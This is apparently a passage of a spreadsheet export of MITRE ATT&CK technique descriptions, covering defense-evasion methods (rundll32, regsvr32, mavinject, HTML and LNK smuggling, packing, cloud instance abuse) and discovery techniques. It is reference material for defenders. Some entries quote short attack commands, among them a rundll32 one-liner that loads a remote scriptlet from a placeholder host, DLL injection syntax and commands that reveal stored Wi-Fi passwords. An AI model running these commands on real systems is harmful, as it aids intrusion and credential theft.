Common non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign.  Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of &lt;code&gt;test.gif&lt;/code&gt;. A user may not know that a file is malicious due to the benign appearance and file extension.
Polygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID)</t>
  </si>
  <si>
    <t>Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child" relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022) 
On Linux systems, adversaries may execute a series of [Native API](https://attack.mitre.org/techniques/T1106) calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree.
Another example is using the “daemon” syscall to detach from the current parent process and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) </t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: &lt;code&gt;[ComRegisterFunction]&lt;/code&gt; or &lt;code&gt;[ComUnregisterFunction]&lt;/code&gt; respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.
Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)
Code signing certificates may be used to bypass security policies that require signed code to execute on a system. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: &lt;code&gt;rundll32.exe {DLLname, DLLfunction}&lt;/code&gt;).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: &lt;code&gt;rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"&lt;/code&gt;  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command &lt;code&gt;rundll32.exe ExampleDLL.dll, ExampleFunction&lt;/code&gt;, rundll32.exe would first attempt to execute &lt;code&gt;ExampleFunctionW&lt;/code&gt;, or failing that &lt;code&gt;ExampleFunctionA&lt;/code&gt;, before loading &lt;code&gt;ExampleFunction&lt;/code&gt;). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending &lt;code&gt;W&lt;/code&gt; and/or &lt;code&gt;A&lt;/code&gt; to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: &lt;code&gt;rundll32.exe file.dll,#1&lt;/code&gt;).
Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) </t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device.  A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)
When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design.  In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.  In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.  
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)
Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running &lt;code&gt;verclsid.exe /S /C {CLSID}&lt;/code&gt;, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) </t>
  </si>
  <si>
    <t>Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.
API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)</t>
  </si>
  <si>
    <t>Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)
Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. &lt;code&gt;C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL&lt;/code&gt;).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. 
In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its  &lt;code&gt;/HMODULE&lt;/code&gt; command-line parameter (ex. &lt;code&gt;mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER&lt;/code&gt;). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless)
Similar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage.
Adversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored.
Some forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\System32\Wbem\Repository`) or Registry (e.g., `%SystemRoot%\System32\Config`) physical files.(Citation: Microsoft Fileless) </t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control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 (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) 
Adversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) 
For example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) 
Embedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)</t>
  </si>
  <si>
    <t>An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)
On embedded devices, downgrading the version typically only requires replacing the operating system file in storage.  With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart.  The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.
Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).  Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).  </t>
  </si>
  <si>
    <t>Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)</t>
  </si>
  <si>
    <t>Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as &lt;code&gt;text/plain&lt;/code&gt; and/or &lt;code&gt;text/html&lt;/code&gt;. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.
For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as &lt;code&gt;msSaveBlob&lt;/code&gt;.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.
To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection.  The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.
To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system.  This method typically requires administrative level access to the device.
In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system.  Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory.  This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.
By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).  Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).
Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.   When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system.  By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. 
When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). 
When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots.  However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory. 
Adversaries may abuse this LNK metadata to download malicious payloads. For example, adversaries have been observed using LNK files as phishing payloads to deliver malware. Once invoked (e.g., [Malicious File](https://attack.mitre.org/techniques/T1204/002)), payloads referenced via external URLs within the LNK icon location field may be downloaded. These files may also then be invoked by [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)/[System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218) arguments within the target path field of the LNK.(Citation: Unprotect Shortcut)(Citation: Booby Trap Shortcut 2017)
LNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) 
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)  </t>
  </si>
  <si>
    <t>Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using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modify the file to explicitly avoid that signature, and then re-use the malware.</t>
  </si>
  <si>
    <t>Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018)
Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.
[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) 
By the end of 2017, a threat group used &lt;code&gt;Invoke-PSImage&lt;/code&gt; to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)  </t>
  </si>
  <si>
    <t>An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
In on-premises Exchange and Exchange Online, the&lt;code&gt;Get-GlobalAddressList&lt;/code&gt; PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)</t>
  </si>
  <si>
    <t>Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), &lt;code&gt;tracert&lt;/code&gt;, and GET requests to websites.
Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi network’s corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)
On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)
</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Commands such as &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscl . -list /Groups&lt;/code&gt; on macOS, and &lt;code&gt;groups&lt;/code&gt; on Linux can list local groups.</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.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It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the &lt;code&gt;DescribeSecurityGroups&lt;/code&gt; action with various request parameters. (Citation: DescribeSecurityGroups - Amazon Elastic Compute Cloud)</t>
  </si>
  <si>
    <t>Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Commands such as &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility,  &lt;code&gt;dscacheutil -q group&lt;/code&gt; on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain-level groups.</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)
There are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) 
For example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language&lt;/code&gt; or parsing the outputs of Windows API functions &lt;code&gt;GetUserDefaultUILanguage&lt;/code&gt;, &lt;code&gt;GetSystemDefaultUILanguage&lt;/code&gt;, &lt;code&gt;GetKeyboardLayoutList&lt;/code&gt; and &lt;code&gt;GetUserDefaultLangID&lt;/code&gt;.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018)
On a macOS or Linux system, adversaries may query &lt;code&gt;locale&lt;/code&gt; to retrieve the value of the &lt;code&gt;$LANG&lt;/code&gt; environment variable.</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.
With authenticated access there are several tools that can be used to find accounts. The &lt;code&gt;Get-MsolRoleMember&lt;/code&gt; PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command &lt;code&gt;az ad user list&lt;/code&gt; will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) 
